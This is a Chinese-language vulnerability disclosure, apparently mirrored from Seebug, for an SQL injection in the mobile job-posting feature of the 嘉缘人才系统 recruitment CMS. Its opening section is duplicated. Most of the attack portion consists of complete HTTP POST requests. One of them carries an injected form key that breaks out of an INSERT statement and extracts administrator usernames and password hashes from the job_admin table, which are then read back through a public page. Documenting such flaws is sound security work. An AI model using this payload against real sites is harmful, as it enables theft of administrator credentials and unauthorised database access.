VULHUB ™

### 简要描述： 嘉缘人才系统某功能1处SQL注入. (demo测试) http://v2014.rccms.com/ ### 详细说明： http://v2014.rccms.com/wap/?a=savevhire&wap 嘉缘人才系统手机版“发布微招聘”功能关键字未过滤，导致SQL注入。 进入http://v2014.rccms.com/wap/，然后选择发布微招聘: [<img src="https://images.seebug.org/upload/201411/23201816dfe3237c6325c5846d414e03c7e21465.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/23201816dfe3237c6325c5846d414e03c7e21465.png) 内容随意填，发布的时候使用burp修改一下,再POST的内容里面添加一个tttttt=ttttt: ``` POST /wap/?a=savevhire&wap HTTP/1.1 Host: v2014.rccms.com Proxy-Connection: keep-alive Content-Length: 157 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://v2014.rccms.com User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://v2014.rccms.com/wap/?a=addvhire&wap Accept-Encoding: gzip,deflate...

### 简要描述： 嘉缘人才系统某功能1处SQL注入. (demo测试) http://v2014.rccms.com/ ### 详细说明： http://v2014.rccms.com/wap/?a=savevhire&wap 嘉缘人才系统手机版“发布微招聘”功能关键字未过滤，导致SQL注入。 进入http://v2014.rccms.com/wap/，然后选择发布微招聘: [<img src="https://images.seebug.org/upload/201411/23201816dfe3237c6325c5846d414e03c7e21465.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/23201816dfe3237c6325c5846d414e03c7e21465.png) 内容随意填，发布的时候使用burp修改一下,再POST的内容里面添加一个tttttt=ttttt: ``` POST /wap/?a=savevhire&wap HTTP/1.1 Host: v2014.rccms.com Proxy-Connection: keep-alive Content-Length: 157 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://v2014.rccms.com User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://v2014.rccms.com/wap/?a=addvhire&wap Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,ja;q=0.4 Cookie: **********cookie************ v_comname=test&v_place=test&v_number=2&v_request=aaa&v_address=test&v_tel=88888888&v_contact=%C1%AA%CF%B5%C8%CB&v_validity=3&Submit=%B7%A2%B2%BC&tttttt=ttttt ``` 提交就会发现存在SQL error: [<img src="https://images.seebug.org/upload/201411/232018391a8abcee2926194776f14b482c339a04.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/232018391a8abcee2926194776f14b482c339a04.png) 基本可以确定post的key被带入了SQL了。然后我们构造一个key=value,这里的key用来获取job_admin的内容，如下： ``` v_place%2Cv_number%2Cv_request%2Cv_address%2Cv_tel%2Cv_contact%2Cv_validity%2Cv_adddate%2Cv_ip%2Cv_flag)%0AVALUES(0x74657374%2C0x74657374%2C1%2Bchar(%40%60'%60)%2Csubstr((select(group_concat(a_user%2C0x7c%2Ca_pass))from%0A%0Ajob_admin)%2C1%2C20)%2C1%2C1%2C1%2C3%2CNOW()%2C0%2C1)%23'=4 ``` 完整的POST为： ``` POST /wap/?a=savevhire&wap HTTP/1.1 Host: v2014.rccms.com Proxy-Connection: keep-alive Content-Length: 347 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://v2014.rccms.com User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://v2014.rccms.com/wap/?a=addvhire&wap Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,ja;q=0.4 Cookie: ************your cookie************* v_comname=test&v_place%2Cv_number%2Cv_request%2Cv_address%2Cv_tel%2Cv_contact%2Cv_validity%2Cv_adddate%2Cv_ip%2Cv_flag)%0AVALUES(0x74657374%2C0x74657374%2C1%2Bchar(%40%60'%60)%2Csubstr((select(group_concat(a_user%2C0x7c%2Ca_pass))from%0A%0Ajob_admin)%2C1%2C20)%2C1%2C1%2C1%2C3%2CNOW()%2C0%2C1)%23'=4&v_place=test&v_tel=88888888&Submit=%B7%A2%B2%BC ``` 发布之后，就可以再微招聘厘米面看到job_admin的内容了： [<img src="https://images.seebug.org/upload/201411/23201913fa371027d835a59e793bfa4a5eaab938.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/23201913fa371027d835a59e793bfa4a5eaab938.png) ``` http://v2014.rccms.com/vhire/vhire.php?id=96 ``` [<img src="https://images.seebug.org/upload/201411/232020156fd69258b7a551addd72c1e8ce318e3a.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/232020156fd69258b7a551addd72c1e8ce318e3a.png) (由于微招聘没办法删除，因此，再官网试的时候只显示了数据的前20个字符)。 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201411/232018391a8abcee2926194776f14b482c339a04.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/232018391a8abcee2926194776f14b482c339a04.png) [<img src="https://images.seebug.org/upload/201411/23201913fa371027d835a59e793bfa4a5eaab938.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/23201913fa371027d835a59e793bfa4a5eaab938.png) [<img src="https://images.seebug.org/upload/201411/232020156fd69258b7a551addd72c1e8ce318e3a.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/232020156fd69258b7a551addd72c1e8ce318e3a.png)